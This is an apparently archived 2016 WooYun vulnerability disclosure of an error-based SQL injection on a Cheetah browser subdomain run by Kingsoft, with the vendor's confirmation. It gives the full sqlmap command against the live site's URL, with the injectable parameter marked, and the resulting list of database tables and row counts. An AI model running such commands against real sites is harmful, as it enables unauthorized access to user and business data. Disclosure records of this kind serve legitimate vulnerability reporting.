漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0199040
漏洞标题:猎豹某站报错注入/最大表数据量/含管理用户信息/及业务数据
相关厂商:金山网络
漏洞作者: hear7v
提交时间:2016-04-21 20:18
修复时间:2016-06-05 21:10
公开时间:2016-06-05 21:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-21: 厂商已经确认,细节仅向厂商公开
2016-05-01: 细节向核心白帽子及相关领域专家公开
2016-05-11: 细节向普通白帽子公开
2016-05-21: 细节向实习白帽子公开
2016-06-05: 细节向公众公开
简要描述:
猎豹某站报错注入,最大表数据量亿级,含管理用户信息,及业务数据
详细说明:
python sqlmap.py -u "http://an.m.liebao.cn/plugin?android_id=2c758dea19f76e2&app=cheetah_fast&appversion=3.26.3&channel=10000000&devicemodel=LG-F400L&did=kda2jcjv4k2xkz4hyxmina2susos&host_version=2000000*&cpu=armeabi-v7a&language=zh&network=wifi&sdk=19&systemversion=19" --user-agent "Dalvik/1.6.0 (Linux; U; Android 4.4.2; LG-F400L Build/KVT49L.F400L10a)" -a
漏洞证明:
Database: an_browser
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| uvideo_info | 109266155 |
| feedback | 481461 |
| alog | 18414 |
| ia_novel | 18016 |
| homepage_joke | 15553 |
| homepage_hot | 8368 |
| homepage_video | 7748 |
| homepage_game | 3346 |
| mc_iosv2 | 1185 |
| cate_content | 924 |
| drt_operation_icons | 908 |
| drt_alias | 850 |
| search_column_hotwords | 716 |
| gupgradeinfo | 705 |
| mc_android | 618 |
| ia_novel_old | 521 |
| drt_operation | 381 |
| mc_ios | 308 |
| lines_info | 293 |
| website_logo | 138 |
| website | 137 |
| decoder_single_info | 6 |
| mc_user | 6 |
| nav_category | 5 |
| adv_card_module | 4 |
| browser_card | 4 |
| cwebsection | 4 |
| nav_group | 4 |
| vlocation | 4 |
| `language` | 3 |
| decoder_global | 3 |
| gupgrade | 3 |
| nav_jump_more | 3 |
| test | 3 |
| vga | 3 |
| h5game_card | 1 |
+---------------------------------------+---------+
修复方案:
过滤
版权声明:转载请注明来源 hear7v@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2016-04-21 21:09
厂商回复:
感谢提交,多谢关注金山安全,即刻跟进
最新状态:
暂无